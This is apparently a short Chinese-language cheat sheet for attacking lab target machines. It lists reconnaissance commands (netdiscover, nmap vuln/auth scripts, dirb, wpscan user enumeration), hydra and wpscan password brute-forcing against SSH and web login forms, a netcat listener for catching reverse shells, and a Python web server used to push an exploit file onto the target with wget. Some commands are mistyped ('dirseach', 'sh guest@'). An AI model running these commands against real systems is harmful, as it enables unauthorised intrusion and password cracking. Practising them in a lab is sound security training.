扫描:
netdiscover -i eth1 -r 192.168.10.0/24
nmap --script=auth 192.168.10.140 -v -sV auth 健权类验证脚本
nmap --script=vuln 192.168.10.140 -v -sV
dirseach -url 192.168.10.140
whatweb -v 192.168.79.131
dirb http://192.168.10.140:8011
##curl http://192.168.10.140/index.html.bak 这个命令可以直接显示文件里面的内容
wpscan --url http://192.168.10.140/wordpress -e u 用户名的枚举
寻找Linux里面以.bak结尾的备份文件
dirb http://192.168.10.140 -X .bak
爆破:
nmap 192.168.10.140 -v --script=brute -p22
-l是指了用户guest -P是字典
hydra -l guest -P mima.txt ssh://192.168.10.141 -f -vV -o hydra.ssh
wpscan --url http://wordy -P wordypasswd.txt -U wordyuser.txt
hydra -l admin -P /usr/share/john/password.lst 192.168.75.148 http-post-form "/login.php:username=^USER^&password=^PASS^:S=logout" -f
hydra -L /path/to/usernames.txt -P /path/to/passwords.txt http-form-post "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid username"
监听:
nc -lvvp 4444
这个命令将在当前目录启动一个简单的HTTP服务器,监听端口号5555。这样,你就可以在靶机上使用wget命令下载文件
python -m http.server 5555
wget http://192.168.10.140:5555/15285.c(15285.c是文件)
ssh连接靶机:(22/tcp-ssh端口服务)
sh guest@192.168.10.141